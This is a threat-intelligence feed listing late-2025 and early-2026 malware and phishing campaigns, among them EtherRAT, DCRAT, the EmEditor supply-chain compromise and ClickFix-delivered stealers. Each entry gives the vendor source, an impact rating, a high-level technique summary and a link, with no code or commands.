Full ATS Listing

Intel Source:: Sysdig

Intel Name:: EtherRAT_Abuses_Ethereum_for_Fileless_C2

Date of Scan:: 2026-01-01

Impact:: HIGH

Summary:: Researchers at the Sysdig have identified EtherRAT, a newly observed remote access trojan that abuses the Ethereum blockchain for command and control and is delivered through exploitation of the React2Shell vulnerability in Next.js applications, with the malware operating in a fileless manner via Node.js to execute fully in memory and evade disk-based detection, while using smart contract state changes to dynamically resolve active infrastructure for resilient C2 operations; analysis uncovered five post-compromise modules including system reconnaissance that self-terminates on CIS-region locales, credential and cryptocurrency theft targeting wallet seed phrases, API keys, and cloud credentials, a self-propagating worm that scans and exploits additional vulnerable endpoints across internal and external networks, a web server hijacking component used for traffic redirection and monetization, and an SSH-based persistence mechanism using a hard-coded public key, and although initial assessment suggested a possible DPRK nexus, characteristics such as CIS locale exclusion and monetization-focused behavior align more closely with Russian-speaking threat actor tradecraft, indicating either shared tooling or deliberate false flagging.

Source: https://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2

Intel Source:: Zscaler Threatlabz

Intel Name:: BlindEagle_Colombian_Gov_Spearphish_Uses_DCRAT

Date of Scan:: 2025-12-31

Impact:: HIGH

Summary:: Researchers at Zscaler ThreatLabz have identified a spear-phishing campaign attributed to the South American threat actor BlindEagle, targeting a Colombian government agency under the Ministry of Commerce, Industry and Tourism (MCIT). The campaign leveraged a compromised internal email account to distribute phishing messages containing an SVG attachment that redirected victims to a fraudulent judicial web portal. From there, victims were deceived into downloading a JavaScript file that initiated a file-less infection chain. This chain executed multiple obfuscated JavaScript stages and PowerShell commands to deploy the Caminho downloader, which ultimately delivered the DCRAT remote access trojan. The attack demonstrated multi-layered obfuscation, in-memory execution, and the use of legitimate services such as Discord for payload hosting. Caminho’s code contained Portuguese elements, suggesting origins within the Brazilian cybercriminal ecosystem.

Source: https://www.zscaler.com/blogs/security-research/blindeagle-targets-colombian-government-agency-caminho-and-dcrat#indicators-of-compromise--iocs-

Intel Source:: Qianxin Threat Intelligence Center

Intel Name:: EmEditor_Compromise_Info_Stealing_Supply_Chain_Attack

Date of Scan:: 2025-12-31

Impact:: HIGH

Summary:: Researchers at Qianxin Threat Intelligence Center have identified a significant software supply chain compromise impacting the official EmEditor installation packages between December 19 and 22, 2025. The attackers replaced legitimate MSI installers with malicious ones signed by a fake certificate, embedding a PowerShell-based information-stealing payload. Once executed, the malware harvested extensive system and credential data, including operating system details, browser information, VPN configurations, and user credentials across communication and productivity tools. It employed RSA encryption for stolen data and achieved persistence through a malicious Microsoft Edge extension masquerading as a legitimate cloud storage plugin.

Source: https://ti.qianxin.com/blog/articles/emeditor-supply-chain-incident-details-disclosed-en/

Intel Source:: Cloudsek

Intel Name:: Silver_Fox_India_Tax_Phishing_Valley_RAT

Date of Scan:: 2025-12-30

Impact:: HIGH

Summary:: CloudSEK reports a targeted phishing campaign attributed to the Chinese Silver Fox APT abusing India Income Tax–themed lures to gain initial access . Rather than deploying an overtly malicious executable, the operation relies on a convincing PDF decoy that redirects victims to download an installer masquerading as legitimate tax-related content. Once launched, the installer abuses a signed third-party binary to sideload a malicious DLL, allowing execution to blend into normal Windows activity. The loader performs anti-debugging and sandbox checks before decrypting and executing payloads entirely in memory. The infection chain culminates in the deployment of Valley RAT, a modular backdoor designed for long-term, low-noise persistence. Valley RAT uses delayed beaconing, protocol switching, and three-tier command-and-control failover to evade detection and blocking. Registry-based storage enables operators to update C2 infrastructure and deploy new plugins without redeploying malware. The campaign’s victimology, infrastructure, and tooling contradict earlier attribution to India-aligned actors and instead align with known Silver Fox tradecraft. The impact is sustained access with capabilities for credential theft, surveillance, and lateral movement.

Source: https://www.cloudsek.com/blog/silver-fox-targeting-india-using-tax-themed-phishing-lures#iocs

Intel Source:: Securelist

Intel Name:: DNS_Poisoning_Delivers_MgBot

Date of Scan:: 2025-12-29

Impact:: MEDIUM

Summary:: Researchers at Securelist have uncovered a highly targeted campaign by the Evasive Panda threat group, also known as Bronze Highland, Daggerfly, or StormBamboo, that quietly delivers malware by manipulating DNS responses. The campaign relies on victim-specific delivery, with each infection carefully tailored to reduce detection and complicate analysis. The attack impersonates legitimate software updates for widely used applications, allowing it to blend seamlessly into normal user activity. Malware is delivered in multiple stages and proceeds only when specific conditions are met, helping it evade automated defenses. Its components are encrypted, bound to the infected system, and often executed directly in memory or injected into trusted processes to remain hidden. The final payload identified is MgBot, highlighting the group’s focus on long-term remote access and persistent control rather than immediate disruption.

Source: https://securelist.com/evasive-panda-apt/118576/

Intel Source:: 360 Threat Intelligence Center

Intel Name:: Russian_Espionage_Campaign_Abuses_Viber_Messages

Date of Scan:: 2025-12-29

Impact:: HIGH

Summary:: Researchers at the 360 Threat Intelligence Center have observed that UAC-0184, also known as Hive0156, is a Russian state-aligned cyber-espionage group targeting Ukrainian military and government entities through a campaign dubbed "The Dark Side of the Fallen Files," which leverages the Viber messaging platform to deliver malicious ZIP archives containing shortcut files and PowerShell scripts disguised as official Ukrainian parliament correspondence and themed around sensitive military and administrative topics to socially engineer recipients. Once executed, the infection chain retrieves secondary payloads, including HijackLoader, which ultimately deploys the Remcos remote access trojan through a multi-stage process involving DLL side-loading, module stomping, unconventional control flow, and dynamic shellcode decryption to evade detection. HijackLoader performs security product reconnaissance, disables built-in protections, establishes persistence via scheduled tasks, and obscures execution.

Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247507757&idx=1&sn=cf6b118e88395af45a000aae80811264&poc_token=HFVIUmmjA1Fa1PlHP1hqdS28HznjEUfHODrHwWqV

Intel Source:: Socket

Intel Name:: npm_Spearphishing_Document_Lures_AiTM

Date of Scan:: 2025-12-28

Impact:: HIGH

Summary:: Researchers from the Socket Threat Research Team uncovered a sustained spearphishing campaign that abuses the npm registry as durable hosting for browser-based phishing lures . Instead of compromising developers through malicious dependencies, the actor repurposes npm packages as web-delivered phishing components that execute directly in the victim’s browser. The operation ran for at least five months and involved 27 malicious packages published under multiple aliases. These packages impersonate secure document-sharing portals and Microsoft sign-in pages, with the victim’s email address prefilled to increase credibility. The campaign is highly targeted, focusing on sales and commercial staff at manufacturing, industrial automation, plastics, and healthcare organizations. Once the lure is opened, client-side JavaScript replaces page content and guides the victim through a staged verification flow. Lightweight anti-analysis controls, including bot detection, honeypot form fields, and interaction gating, are used to evade scanners. Credential submission redirects victims to threat actor-controlled infrastructure associated with adversary-in-the-middle techniques. In some cases, the infrastructure overlaps with Evilginx-style patterns capable of stealing session cookies and bypassing MFA. The impact is credential compromise with potential downstream account takeover rather than endpoint malware infection

Source: https://socket.dev/blog/spearphishing-campaign-abuses-npm-registry?utm_medium=feed

Intel Source:: Asec

Intel Name:: A_Deployment_of_CoinMiner_Payloads

Date of Scan:: 2025-12-28

Impact:: MEDIUM

Summary:: Researchers at ASEC have uncovered multiple campaigns that exploit a GeoServer remote code execution vulnerability (CVE-2024-36401) to install cryptocurrency miners on exposed servers. The attackers scan the internet for vulnerable GeoServer deployments rather than targeting specific organizations. Once access is gained, the attackers deploy XMRig-based CoinMiner payloads to hijack system resources for cryptomining. In some cases, they use multi-stage PowerShell and Bash scripts, including droppers delivered via certutil and downloaders that can run payloads directly in memory. The attackers also try to weaken host defenses by adding Windows Defender exclusions and disabling security settings to keep their access longer.

Source: https://asec.ahnlab.com/en/91724/

Intel Source:: Securelist

Intel Name:: Webrat_GitHub_Exploit_Lure_Backdoor

Date of Scan:: 2025-12-27

Impact:: MEDIUM

Summary:: Researchers from Securelist have uncovered a Webrat campaign that shifts distribution from game cheats and cracked software to fake exploits hosted on GitHub repositories . Instead of targeting casual users, the attackers now focus on students and inexperienced security professionals by disguising malware as proof-of-concept exploits for high-profile vulnerabilities. The repositories are carefully crafted with AI-generated vulnerability descriptions and realistic mitigation guidance to appear legitimate. Victims are lured into downloading password-protected archives that contain a decoy file alongside a malicious loader. Once executed, the loader escalates privileges, disables Windows Defender, and retrieves the Webrat backdoor from a remote server. The end goal is persistent system access and data theft, including credentials, messaging accounts, and surveillance via keylogging and media capture

Source: https://securelist.com/webrat-distributed-via-github/118555/

Intel Source:: Seqrite

Intel Name:: Tax_Themed_Phish_NSIS_RAT_Fake_ITD

Date of Scan:: 2025-12-27

Impact:: HIGH

Summary:: Researchers from Seqrite have uncovered a tax-themed phishing campaign targeting Indian businesses that impersonates the Indian Income Tax Department to deliver a remote access malware payload. The attack begins with spearphishing emails using urgent compliance lures that direct victims to a fraudulent tax portal hosting a malicious ZIP archive. When executed, the archive launches a multi-stage NSIS installer chain that drops and executes a hidden RAT component while attempting to weaken local security controls. The malware establishes persistence by registering a Windows service disguised as a legitimate system protection service. It then performs system reconnaissance, collects host and software information, and registers the infected device with attacker-controlled infrastructure. The implant communicates with its command-and-control servers over multiple ports, enabling remote command execution and follow-on activity. The campaign emphasizes persistence and operational control, posing significant risk to affected organizations through sustained endpoint compromise

Source: https://www.seqrite.com/blog/indian-income-tax-themed-phishing-campaign-targets-local-businesses/

Intel Source:: Socket

Intel Name:: Phantom_Shuttle_Malicious_Chrome_VPN

Date of Scan:: 2025-12-26

Impact:: HIGH

Summary:: Researchers from Socket have uncovered a long-running malicious Chrome extension campaign tracked as Phantom Shuttle that masquerades as a legitimate VPN and network testing tool. The activity targets developers and foreign trade workers through professionally branded Chrome Web Store listings and a paid subscription model that builds trust and reduces suspicion. The extensions abuse Chrome proxy and authentication APIs to silently inject hardcoded credentials, placing victims in an adversary-in-the-middle position and routing traffic through attacker-controlled infrastructure. The report details how the extensions continuously exfiltrate user emails and passwords via periodic heartbeat communications while selectively proxying high-value domains such as cloud services and developer platforms. This operation has remained active since at least 2017, posing significant credential theft and downstream enterprise and supply-chain risk.

Source: https://socket.dev/blog/malicious-chrome-extensions-phantom-shuttle?utm_medium=feed

Intel Source:: AhnLab SEcurity intelligence Center

Intel Name:: EtherRAT_React2Shell_Exploit_Distribution

Date of Scan:: 2025-12-26

Impact:: HIGH

Summary:: ASEC reports an active campaign exploiting the React2Shell vulnerability (CVE-2025-55182) to deploy EtherRAT via automated scanning of exposed React/Next.js servers. The multi-stage Node.js infection chain installs a RAT capable of command execution, credential and cryptocurrency theft, SSH key persistence, and propagation. EtherRAT uniquely resolves its C2 through Ethereum smart contract queries, indicating higher operational sophistication. The activity is opportunistic and high impact, enabling persistent access and financial theft

Source: https://asec.ahnlab.com/en/91658/

Intel Source:: Huntress

Intel Name:: Repeated_IIS_Intrusions_Lead_to_Malware_Access

Date of Scan:: 2025-12-25

Impact:: LOW

Summary:: Researchers from Huntress have uncovered three intrusions in which a threat actor repeatedly failed and retried actions until malware execution and persistence partially succeeded. In each case, the activity originated from Microsoft IIS web servers, with commands executed under the IIS worker process. The actor relied on basic but effective techniques, including system enumeration, downloading and launching files using built-in Windows utilities, and repeatedly attempting to run the same payloads after initial failures. In later stages, they attempted to weaken defenses by adding Microsoft Defender exclusions and attempted to establish persistence by creating a Windows service, although some efforts failed due to misconfiguration. The affected victims included a development firm, a manufacturing organization, and an enterprise shared services provider, indicating broad and opportunistic targeting rather than a focus on a specific industry.

Source: https://www.huntress.com/blog/trial-error-typos-malware-attacks-sophisticated

Intel Source:: Hunt.IO

Intel Name:: Shared_Lazarus_Kimsuky_Attack_Infrastructure

Date of Scan:: 2025-12-25

Impact:: HIGH

Summary:: Researchers from Hunt.io and Acronis Threat Research identified a campaign linked to the North Korea–aligned groups Lazarus and Kimsuky by analysing how their infrastructure is reused across operations, rather than focusing on a single malware. The report shows that the same servers, certificates, ports, and hosting choices appear again and again, revealing consistent operator behavior. The researchers also uncovered open directories exposing credential-stealing tools, repeated use of tunneling and proxy services, and infrastructure that supports remote access and command-and-control activity. The analysis links the Lazarus group to a Linux backdoor called Badcall and its supporting hosting environment, while another highlight open directories filled with mixed toolsets for credential theft, data exfiltration, and remote administration. Overall, the activity suggests the actors can quickly scale and redeploy proxy nodes across multiple VPS providers with minimal effort.

Source: https://hunt.io/blog/dprk-lazarus-kimsuky-infrastructure-uncovered

Intel Source:: CheckPoint

Intel Name:: Ink_Dragon_Espionage_Campaign

Date of Scan:: 2025-12-24

Impact:: HIGH

Summary:: Check Point researchers have identified an espionage campaign conducted by the PRC-aligned threat actor Ink Dragon, also tracked as CL-STA-0049, Earth Alux, and REF7707. The group primarily targets government, telecommunications, and other public-sector organizations across Southeast Asia, South America, Africa, and Europe. Initial access is typically achieved by exploiting ASP.NET ViewState deserialization vulnerabilities on exposed IIS and SharePoint servers, as well as the SharePoint ToolShell vulnerability, enabling remote code execution without user interaction. After gaining access, the actors rapidly escalate privileges, harvest credentials and authentication tokens, and pivot laterally by abusing administrative RDP sessions. They deploy ShadowPad and FinalDraft malware to establish C2, move laterally across Windows environments, and exfiltrate sensitive data. Throughout the campaign, Ink Dragon consistently abuses legitimate digital signatures and disguises malicious binaries as native Windows components to evade detection and blend into normal system activity.

Source: https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/

Intel Source:: Jamf

Intel Name:: MacSync_Stealer

Date of Scan:: 2025-12-24

Impact:: MEDIUM

Summary:: Researchers from Jamf Threat Labs have uncovered a MacSync Stealer campaign that marks a shift from earlier user-driven infection methods to a quieter, more automated approach on macOS. Instead of relying on ClickFix tricks or forcing users to paste commands into Terminal, the attackers now distribute a code-signed and notarized Swift application inside a disk image that looks legitimate and includes decoy content to appear trustworthy. Once launched, the app silently fetches an encoded script from a remote server and runs it using a built-in helper, with no further user interaction. The malware checks its environment and internet connectivity before proceeding, limits how often it can run, and lightly validates downloaded content to avoid errors and reduce suspicion. By minimizing warnings and user prompts, the campaign supports stealthy execution, with the end goal of infostealer activity such as stealing credentials and sensitive data from macOS systems.

Source: https://www.jamf.com/blog/macsync-stealer-evolution-code-signed-swift-malware-analysis/

Intel Source:: Push Security

Intel Name:: ConsentFix_A_New_Phishing_Attack_Technique

Date of Scan:: 2025-12-24

Impact:: MEDIUM

Summary:: Researchers at Push Security have identified ConsentFix, a browser-native phishing technique that abuses OAuth consent flows combined with ClickFix-style user interaction to compromise Microsoft cloud accounts without requiring passwords or MFA prompts. Victims are lured via search results to compromised or malicious websites that masquerade as routine security checks and guide users to complete a legitimate Microsoft sign-in in a separate tab. By tricking users into copying authorization data from the browser address bar back into the lure page, attackers can redeem OAuth tokens using Azure command-line tooling. This enables control over the victim’s Microsoft identity and associated resources while relying solely on standard cloud application workflows. The attack operates entirely within the browser, evades many endpoint and email-based defenses, and uses selective targeting and anti-analysis measures to reduce detection.

Source: https://pushsecurity.com/blog/consentfix#id-recommendations_id-iocs

Intel Source:: Rapid7 Labs

Intel Name:: SantaStealer_Emerging_Infostealer_Malware

Date of Scan:: 2025-12-23

Impact:: MEDIUM

Summary:: Researchers at Rapid7 Labs have identified SantaStealer, a newly emerging infostealer malware being actively marketed on underground forums and Telegram channels as part of a growing infostealer-as-a-service ecosystem. The malware is currently under development and offered in subscription-based tiers that advertise advanced anti-analysis and stealth features, although technical examination suggests these claims are not yet fully realized. SantaStealer is designed to collect credentials, browser data, crypto wallet information, and system artifacts from Windows environments, employing techniques such as reflective DLL loading, in-memory execution, and the ChaCha20 encryption algorithm to obfuscate its activity. The stealer’s modular framework and web-based control panel allow operators to customize payloads, manage infected hosts, and test files for antivirus detection. Uniquely, SantaStealer provides an option to exclude victims in the Commonwealth of Independent States (CIS), indicating targeting preferences consistent with actors from Russian-speaking regions. The malware’s use of a web panel hosted under a .su domain, coupled with its rapid feature development and commercialization, points to an organized criminal operation seeking to capture market share within the commodity infostealer landscape.

Source: https://www.rapid7.com/blog/post/tr-santastealer-is-coming-to-town-a-new-ambitious-infostealer-advertised-on-underground-forums/

Intel Source:: Cyble

Intel Name:: Targeted_Email_Campaigns

Date of Scan:: 2025-12-23

Impact:: MEDIUM

Summary:: Researchers from Cyble have uncovered a targeted email campaign that uses a multi-stage loader to deliver malware, including remote access trojans and information stealers. The attack begins with spear-phishing emails disguised as purchase order communications, in which malicious attachments trigger scripts that download and execute additional components. To evade detection, the loader employs heavy obfuscation, execution delays, and in-memory loading to minimize forensic artifacts on the system. The campaign also conceals malicious code within image files using steganography and weaponizes legitimate open-source libraries by appending malicious code while keeping their expected functionality. The final payload injects itself into a trusted Windows process to blend in with legitimate activity and focuses on stealing credentials and sensitive data. Overall, the campaign primarily targets industrial organizations, with the goal of harvesting sensitive information and credentials for further compromise.

Source: https://cyble.com/blog/stealth-in-layers-unmasking-loader-in-targeted-email-campaigns/

Intel Source:: Dexpose

Intel Name:: Arkanix_Stealer_Discord_Infostealer

Date of Scan:: 2025-12-22

Impact:: HIGH

Summary:: Researchers from DeXpose have identified an actively developed infostealer campaign centered around Arkanix Stealer, which is primarily marketed and distributed through Discord and underground forums. The malware is disguised as legitimate tools, enticing users to execute the payload on Windows systems. Once launched, Arkanix bypasses core Windows security controls, including AMSI and ETW, using in-memory patching to evade detection. It employs strong anti-analysis and anti-VM checks to limit execution in sandboxed environments. The stealer then harvests a wide range of sensitive data, including browser credentials, cryptocurrency wallets, VPN accounts, Discord tokens, WiFi credentials, and system metadata. Collected data is compressed and exfiltrated to attacker-controlled infrastructure hidden behind Cloudflare, enabling scalable and stealthy credential theft operations.

Source: https://www.dexpose.io/deep-dive-into-arkanix-stealer-and-its-infrastructure/

Intel Source:: ESET

Intel Name:: LongNosedGoblin_Targets_Asian_Governments

Date of Scan:: 2025-12-22

Impact:: HIGH

Summary:: Researchers at ESET identified a previously undocumented, China-aligned advanced persistent threat group named LongNosedGoblin, active since at least September 2023 and focused on cyberespionage against government institutions in Southeast Asia and Japan. The group seeks to exfiltrate sensitive information through sustained campaigns, with a distinctive tactic of abusing Windows Group Policy to enable lateral movement and large-scale malware deployment across compromised environments. Its toolkit consists mainly of custom C# and .NET malware, including components for browser history collection, multi-stage backdoor access, credential and data theft via cloud platforms, PowerShell-based payload delivery, and encrypted keystroke logging, supported by advanced execution methods such as AppDomainManager injection and AMSI bypass for evasion. Investigations also revealed the use of living-off-the-land binaries and execution guardrails to restrict activity to intended victims, along with indications of possible tool sharing with other China-aligned groups, despite clear differences in tactics and techniques. Activity observed again in September 2025 showed continued use of similar methods and abuse of common cloud services as covert command-and-control channels, reinforcing assessments that LongNosedGoblin operates with moderate to high sophistication in support of long-term intelligence collection tied to regional government affairs.

Source: https://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/

Intel Source:: Intezer

Intel Name:: Paper_Werewolf_Campaign

Date of Scan:: 2025-12-21

Impact:: MEDIUM

Summary:: Researchers from Intezer have uncovered a Paper Werewolf (also known as GOFFEE) campaign that leverages malicious Excel XLL add-ins and AI-generated decoy documents to deploy a new backdoor, dubbed EchoGather. The operation relies on social engineering and user interaction, with execution techniques designed to delay activity, evade sandbox detection, and minimize visible indicators of compromise. Once established, EchoGather collects basic system and user information and maintains periodic communication with its C2 servers over encrypted web traffic. The backdoor also supports remote command execution and file exfiltration. The decoy content is crafted to resemble official Russian-language documents and invitations, and the identified victims include Russian organizations associated with defense and industrial sectors, indicating an intelligence-gathering campaign.

Source: https://intezer.com/blog/tracing-a-paper-werewolf-campaign-through-ai-generated-decoys-and-excel-xlls/

Intel Source:: Sophos

Intel Name:: Deployment_of_StealC_and_Qilin_Payloads_Through_Clickfix

Date of Scan:: 2025-12-20

Impact:: MEDIUM

Summary:: Researchers from Sophos have uncovered a campaign that leverages fake “ClickFix” human-verification prompts to trick users into executing malicious script, ultimately leading to infostealer infection and ransomware deployment. The attack begins on a compromised but legitimate website that delivers a malicious script and presents a highly convincing verification workflow. When users follow the on-screen instructions, a legitimate remote access tool is installed and then abused to establish remote control of the system. From this foothold, the attackers deploy additional payloads, including the StealC V2 infostealer via DLL sideloading, followed by Qilin ransomware, , showing that the intrusion escalated from initial access to ransomware deployment. Stolen credentials were also used to access VPN devices, suggesting that the infostealer-derived access was likely sold or handed off to a Qilin affiliate.

Source: https://www.sophos.com/en-us/blog/i-am-not-a-robot-clickfix-used-to-deploy-stealc-and-qilin

Intel Source:: Cyfirma

Intel Name:: APT36_LNK_Based_Malware_Campaign

Date of Scan:: 2025-12-20

Impact:: MEDIUM

Summary:: Researchers from Cyfirma have uncovered a targeted malware campaign attributed to APT36 that uses social engineering to trick users into opening a malicious Windows shortcut disguised as a PDF advisory. The attack abuses default Windows behavior that hides file extensions, making the shortcut to appear benign. When executed, it silently runs an obfuscated command that downloads and installs a remote MSI file. This MSI acts as a loader for a multi-stage infection chain, deploying a .NET-based loader along with additional malicious components. To avoid suspicion, a decoy document is displayed while the malware executes in the background. The payload establishes persistence through registry modifications, enabling it to survive system reboots, and allow C2 functionality for remote command execution. It also collects basic system information, such as installed antivirus products, and performs checks to evade virtualized or sandboxed environments.

Source: https://www.cyfirma.com/research/apt36-lnk-based-malware-campaign-leveraging-msi-payload-delivery/

Intel Source:: Unit42

Intel Name:: RansomHouse_RaaS_Operation

Date of Scan:: 2025-12-19

Impact:: HIGH

Summary:: Researchers at Unit 42 have identified a new ransomware-as-a-service (RaaS) operation known as RansomHouse, attributed to a threat group they track as Jolly Scorpius, which primarily targets VMware ESXi environments. The group employs a double-extortion model, combining large-scale data theft with encryption and threats to leak or sell stolen data. Activity on its data-leak site indicates a growing focus on high-value organizations across healthcare, finance, transportation, and government sectors, reflecting an emphasis on victims holding sensitive and monetizable information. RansomHouse leverages a modular toolset, including MrAgent, an ESXi management and deployment utility that maintains persistent C2 access, collects host and network details, and can disable the ESXi firewall, and Mario, a hypervisor-level ransomware payload that encrypts virtualization-related files across multiple virtual machines, drops ransom notes, and reports detailed encryption statistics.

Source: https://unit42.paloaltonetworks.com/ransomhouse-encryption-upgrade/

Intel Source:: Infoblox

Intel Name:: Malicious_Domain_Parking_Ecosystem

Date of Scan:: 2025-12-19

Impact:: HIGH

Summary:: Researchers at Infoblox Threat Intel have identified a widespread abuse of the domain parking and direct search advertising ecosystem, where cyber actors monetize mistyped or abandoned domains to deliver malicious content and redirect users to harmful destinations. The investigation revealed that parked and lookalike domains, traditionally considered benign, are increasingly being leveraged as part of sophisticated malvertising and traffic distribution operations. Threat actors use advanced techniques such as DNS fast flux, GeoIP-based fingerprinting, and selective redirection to evade detection and deliver payloads including information stealers, spyware, and trojans through advertising networks. These operations are supported by large domain portfolios that impersonate major brands and exploit user errors in DNS resolution or browser navigation. The malicious ecosystem involves multiple intermediaries, including advertisers and traffic brokers, who resell visitor data and redirect chains to malware delivery systems. This convergence of legitimate ad infrastructure and malicious manipulation blurs attribution and complicates mitigation.

Source: https://blogs.infoblox.com/threat-intelligence/parked-domains-become-weapons-with-direct-search-advertising/

Intel Source:: Cisco Talos

Intel Name:: UAT_9686_Targeting_Cisco_AsyncOS_Software

Date of Scan:: 2025-12-19

Impact:: MEDIUM

Summary:: Researchers at Cisco Talos have identified an ongoing cyber-espionage campaign targeting Cisco AsyncOS appliances used by Cisco Secure Email Gateway and Cisco Secure Email and Web Manager. The activity, tracked as UAT-9686 and assessed with moderate confidence to be linked to a China-aligned APT, has been active since at least late November 2025. After gaining initial access, the attackers deploy a custom backdoor called AquaShell, which is embedded within an existing Python-based web server file and enables unauthenticated remote command execution via crafted web requests. The campaign also employs tunneling tools to maintain persistent access to attacker-controlled infrastructure, including reverse-SSH–like functionality and generic TCP/UDP tunneling. To evade detection, the attackers use a log-cleaning utility known as AquaPurge to remove evidence of their activity from system logs.

Source: https://blog.talosintelligence.com/uat-9686/

Intel Source:: K7 Labs

Intel Name:: Phantom_Information_Stealer

Date of Scan:: 2025-12-19

Impact:: MEDIUM

Summary:: Researchers at K7 Labs have identified Phantom 3.5, a .NET-based information-stealing malware distributed via a trojanized “Adobe 1.17.7” installer hosted on cracked software sites. The installer initiates a PowerShell based multi-stage infection chain that decrypts and loads additional .NET components entirely in memory. A loader component, tracked as BLACKHAX, performs process injection by hijacking an Agent_Compiler executable and injecting the final stealer payload into selected processes. The malware uses RC4-encrypted payloads, in-memory .NET assembly loading, and process hollowing to detection harder. Once established, Phantom 3.5 established persistence through registry run keys and scheduled tasks and conducts environment checks to evade sandboxing and security controls. The stealer is capable of harvesting browser data, credentials, cookies, autofill and credit card information, files, desktop and browser-based wallets, clipboard contents, system information, and stored Wi-Fi passwords. It also includes keylogging functionality and can extract credentials from multiple applications, including browsers, email clients, file-transfer tools, and other local credential stores. For data exfiltration, the malware packages stolen information and transmits it via SMTP as well as alternative channels such as FTP, Discord, and Telegram.

Source: https://labs.k7computing.com/index.php/phantom-3-5-initial-vector-analysis-forensics/

Intel Source:: Securelist

Intel Name:: ForumTroll_Academic_Phishing_Campaign

Date of Scan:: 2025-12-18

Impact:: MEDIUM

Summary:: Researchers at Kaspersky’s Global Research and Analysis Team (GReAT) have identified a renewed cyber-espionage campaign conducted by the ForumTroll APT group, targeting political scientists and academics in Russia. The operation represents a continuation of the group’s earlier 2025 activities but with a shift from exploiting browser vulnerabilities to using highly tailored phishing emails. These emails impersonated a well-known Russian electronic library and were crafted to appear as plagiarism notifications, deceiving recipients into downloading malicious archives. Each archive contained a shortcut file that executed a PowerShell script designed to retrieve and install a secondary payload, ultimately delivering a remote access framework known as Tuoni. The attackers employed COM hijacking for persistence and relied on cloud-based content delivery infrastructure for command-and-control communication, demonstrating technical competence and operational discipline.

Source: https://securelist.com/operation-forumtroll-new-targeted-campaign/118492/

Intel Source:: Koi Research

Intel Name:: GhostPoster_Malware_Hiding_in_Firefox_Extensions

Date of Scan:: 2025-12-18

Impact:: HIGH

Summary:: Researchers at Koi Research have uncovered GhostPoster, a coordinated malicious campaign abusing Firefox browser extensions to deliver multi-stage malware through PNG image steganography, centered on a rogue free VPN extension active since September 2025 and 16 related add-ons that together amassed over 50,000 installs, the extensions hid JavaScript payloads inside image logo files, extracting a loader at runtime that contacted external command-and-control infrastructure to fetch encrypted payloads executed in memory, enabling monetization-focused activity such as affiliate hijacking, browser security header stripping, tracking injection, CAPTCHA bypass, and hidden iframe insertion for click fraud, while evading detection through delayed activation, randomized check-ins, XOR encryption, and runtime-only execution.

Source: https://www.koi.ai/blog/inside-ghostposter-how-a-png-icon-infected-50-000-firefox-browser-users#heading-9

Intel Source:: Point Wild

Intel Name:: DarkGate_ClickFix_Social_Engineering_Chain

Date of Scan:: 2025-12-18

Impact:: HIGH

Summary:: Researchers at Point Wild’s Lat61 Threat Intelligence Team have identified a sophisticated infection chain leveraging a technique dubbed ClickFix to deliver the DarkGate malware. This campaign exploits human behavior rather than software vulnerabilities, deceiving users into executing PowerShell commands under the guise of troubleshooting or browser extension fixes. The attack sequence involves multilayered scripts hidden within HTML content that decode and execute PowerShell payloads, leading to the retrieval of additional components. These payloads are designed to establish remote access, deploy secondary binaries, and enable full system compromise. The operation demonstrates advanced evasion tactics, including script obfuscation, Base64 encoding, and the use of legitimate scripting frameworks to disguise malicious intent.

Source: https://www.pointwild.com/threat-intelligence/clickfix-darkgate

Intel Source:: ASEC

Intel Name:: Gentlemen_Ransomware_Global_Dual_Extortion_Surge

Date of Scan:: 2025-12-17

Impact:: HIGH

Summary:: Researchers at ASEC have identified a new ransomware group known as Gentlemen, first observed in August 2025. The group employs a double extortion model, breaching enterprise networks to exfiltrate and encrypt sensitive data before using it for leverage against victims. Written in the Go programming language, the ransomware demonstrates a high level of sophistication through features such as disabling security services, halting backup and database processes, and leveraging Group Policy Object (GPO) manipulation during lateral movement. Execution is restricted via a password argument to prevent analysis in unintended environments, indicating strong operational discipline.

Source: https://asec.ahnlab.com/en/91545/

Intel Source:: Polyswarm

Intel Name:: UDPGangster_Backdoor

Date of Scan:: 2025-12-17

Impact:: MEDIUM

Summary:: Researchers at PolySwarm have identified UDPGangster, a UDP-based backdoor linked to the Iranian state-aligned MuddyWater threat actor, actively used in targeted phishing campaigns against users in Turkey, Israel, and Azerbaijan. The malware is delivered via phishing emails that impersonate official government entities and include macro-enabled Microsoft Word documents. When recipients enable macros, embedded VBA code silently drops and executes the payload while displaying a benign decoy image to avoid arousing suspicion. Once installed, UDPGangster provides attackers with remote access over UDP, enabling command execution, file exfiltration, and deployment of additional payloads while bypassing many traditional network defenses that primarily monitor TCP traffic. The malware also establishes persistence on the infected system and employs extensive anti-analysis and anti-sandbox techniques, including virtual machine detection, hardware and memory checks, debugger detection, and scans for analysis tools, ensuring it primarily executes on real victim environments.

Source: https://blog.polyswarm.io/muddywaters-udpgangster-backdoor

Intel Source:: Binary Defense

Intel Name:: Rust_Malware_Analysis_Techniques_Sample_Breakdown

Date of Scan:: 2025-12-17

Impact:: LOW

Summary:: Binary Defense provides a technical walkthrough of methods for analyzing malware written in the Rust programming language, focusing on compiler behavior, embedded strings, build artifacts, and techniques for recovering entry points in unknown Rust binaries . The report explains how Rust’s lack of a stable ABI, extensive compiler-inserted safety checks, and dependency embedding introduce analytical challenges for defenders. It then demonstrates these techniques on a single unknown Rust sample, revealing its use of HTTP libraries and common Rust runtime initialization patterns but without attributing it to any threat actor or campaign. The report highlights that Rust-based malware is becoming more prevalent due to its cross-platform capabilities and lower detection rates compared to traditional languages. The content is intended to improve analyst proficiency rather than describe an active intrusion or actor behaviors.

Source: https://binarydefense.com/resources/blog/digging-through-rust-to-find-gold-extracting-secrets-from-rust-malware

Intel Source:: Morphisec and Hackread

Intel Name:: PyStoreRAT_Targets_OSINT_Users_via_GitHub

Date of Scan:: 2025-12-17

Impact:: HIGH

